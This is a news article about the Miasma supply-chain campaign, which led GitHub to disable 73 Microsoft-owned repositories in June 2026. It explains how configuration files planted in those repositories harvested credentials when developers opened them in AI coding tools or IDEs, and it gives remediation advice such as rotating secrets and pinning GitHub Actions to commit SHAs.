73 Microsoft GitHub repositories disabled after Miasma malware campaign

GitHub disabled 73 Microsoft-owned repositories after a Miasma supply-chain attack targeted developer workstations, CI/CD environments, and AI coding tools.

The incident affected repositories across Microsoft GitHub organizations, including Azure, Azure-Samples, microsoft, and MicrosoftDocs. According to StepSecurity, the repositories were disabled on June 5, 2026 after a malicious commit reached the Azure/durabletask repository through a previously compromised contributor account.

The campaign did not rely only on traditional package-install tricks. Researchers say the malware planted configuration files that could execute a credential-harvesting payload when developers opened compromised repositories in tools such as Claude Code, Gemini CLI, Cursor, or VS Code.

Miasma targeted Microsoft repositories used by developers

The attack caused visible disruption because some repositories supported workflows used by developers and cloud teams. One affected project was Azure/functions-action, which many GitHub Actions workflows use to deploy Azure Functions apps.

A Microsoft staff response on Microsoft Q&A said the Azure/functions-action repository was disabled during an ongoing issue and recommended temporary alternatives such as Azure CLI, Azure DevOps Pipelines, VS Code deployment, Zip Deploy, or Azure Pipelines.

Access to Azure/functions-action was later restored, but the outage showed how quickly one repository cleanup can break dependent automation across many developer environments.

Incident	Details
Malware family	Miasma
Main impact	Credential theft from developer and cloud environments
Repositories disabled	73 Microsoft-owned GitHub repositories
Reported date	June 5, 2026
Major affected areas	Azure, Azure-Samples, microsoft, and MicrosoftDocs GitHub organizations
Notable affected workflow	Azure/functions-action@v1 deployments
Threat model	Source repository compromise and AI coding agent execution paths

How the attack changed from package poisoning to repo-based execution

Earlier supply-chain attacks often focused on package install hooks such as preinstall, postinstall, setup.py, or build scripts. This campaign showed a newer pattern: pushing malicious configuration files directly into source repositories.

SafeDep reported that Miasma used configuration files and payload runners designed to trigger when a developer opened an affected repository inside AI coding agents or IDEs. This turns the developer’s editor into part of the attack surface.

That change matters because many security tools focus on package registries and dependency installation. A repository that looks harmless during a standard dependency scan may still carry dangerous agent or editor configuration.

• The campaign targeted developer workstations, not only production systems.
• The payload focused on secrets and cloud credentials.
• AI coding tools and IDE workflows became part of the execution path.
• Backdated commits and CI-skipping markers made malicious changes harder to spot.
• Floating GitHub Action tags such as @v1 created extra dependency risk during repository outages.

The durabletask PyPI compromise came before the repository takedown

The Microsoft repository incident followed an earlier compromise involving the durabletask package on PyPI. The affected versions were durabletask 1.4.1, 1.4.2, and 1.4.3.

In its earlier analysis, SafeDep’s durabletask report said those three malicious versions were uploaded on May 19, 2026 using a compromised PyPI API token. The GitHub repository itself was not breached in that first incident, and the attacker uploaded modified packages directly to PyPI.

That distinction matters for defenders. The May incident poisoned a package registry. The June incident involved malicious repository content that could execute through developer tools.

Event	Date	Attack method	Key risk
durabletask PyPI compromise	May 19, 2026	Malicious package versions uploaded using a compromised PyPI token	Credential theft after package import or use
Miasma repository campaign	June 5, 2026	Malicious repository files pushed through a compromised contributor account	Credential theft when repositories opened in AI coding tools or IDEs
Azure/functions-action disruption	June 5, 2026	Repository disabled during investigation	Broken GitHub Actions deployment workflows

Microsoft confirmed some repositories were temporarily removed

Microsoft later confirmed that it temporarily removed some repositories while investigating malicious content. A company spokesperson told TechCrunch that some repositories had been restored after review, while others could remain offline as work continued.

Microsoft also said it notified a small number of customers who may have downloaded affected content. The company did not provide a public number for how many users or organizations may have pulled compromised repositories or files.

The incident highlights a difficult problem for large open-source maintainers. Removing repositories can stop further exposure, but it can also break builds, deployment pipelines, and developer workflows that depend on those repositories.

What Miasma was designed to steal

The Miasma campaign focused on credentials and secrets used by developers and cloud systems. That makes it more dangerous than ordinary nuisance malware because developer credentials can open access to source code, build systems, cloud resources, package registries, and production infrastructure.

The earlier durabletask malware analysis found collectors for AWS, Azure, GCP, Kubernetes, HashiCorp Vault, local password managers, SSH keys, Docker credentials, VPN configuration files, .env files, Terraform state, and other sensitive developer files.

The later repository campaign expanded the concern from package installation to developer tooling. That means teams need to inspect not only package manifests and lockfiles, but also editor settings, agent rules, workspace configuration, and hidden repository files.

Indicator or area	Why it matters
durabletask 1.4.1	Malicious PyPI version tied to the earlier durabletask compromise
durabletask 1.4.2	Second malicious PyPI version from the May 19 incident
durabletask 1.4.3	Third malicious PyPI version with expanded injection points
Azure/durabletask	Repository later named in the June Miasma repository campaign
Azure/functions-action@v1	Common GitHub Action tag disrupted while the repository was disabled
Claude Code, Gemini CLI, Cursor, VS Code	Developer tools named by researchers as part of the execution path
Cloud and CI/CD secrets	High-value targets that can enable deeper supply-chain compromise

Developers should rotate credentials and review recent repo activity

Organizations that cloned or opened affected repositories should treat exposed developer environments as potentially compromised. That includes local machines, CI runners, Codespaces, containers, and cloud build agents.

StepSecurity’s analysis recommends reviewing repository activity and responding quickly where affected projects were opened in AI coding tools or IDEs after the malicious commit window.

Teams should rotate secrets that may have been reachable from affected developer environments. That includes GitHub tokens, Azure credentials, cloud provider keys, PyPI and npm publishing tokens, SSH keys, Vault tokens, Kubernetes credentials, and service account secrets.

• Check whether developers cloned or opened affected Microsoft repositories.
• Rotate GitHub, Azure, PyPI, npm, cloud, SSH, and Kubernetes credentials where exposure is possible.
• Audit GitHub repositories for unexplained commits, new workflows, or suspicious hidden configuration files.
• Review AI coding agent settings, IDE workspace files, and editor rules.
• Pin GitHub Actions to full commit SHAs instead of broad tags where possible.
• Search developer systems for suspicious payload runners, unexpected network calls, and newly created public repositories.
• Review cloud audit logs for unusual secret access and identity token use.

Why this campaign raises supply-chain concerns

The Miasma campaign shows that attackers now look beyond package registries. They also target the tools developers use to read, edit, build, and deploy code.

The Miasma research found that the campaign could execute through multiple developer tools, including AI coding assistants. This makes repository hygiene and tool configuration review part of normal supply-chain defense.

The TechCrunch report also underlined the wider impact of attacks against open-source developer projects, especially when those projects belong to a major cloud provider and serve downstream users.

Microsoft’s Azure/functions-action Q&A thread shows the practical fallout. When a widely used deployment action goes offline, developers need immediate alternatives and a safe path back to trusted dependencies.

The safest response is not only to restore repositories. Organizations should verify provenance, rotate secrets, review repository configuration, and reduce trust in floating tags and long-lived tokens. Miasma shows that supply-chain attacks can start in one developer account and quickly reach many more environments.

FAQ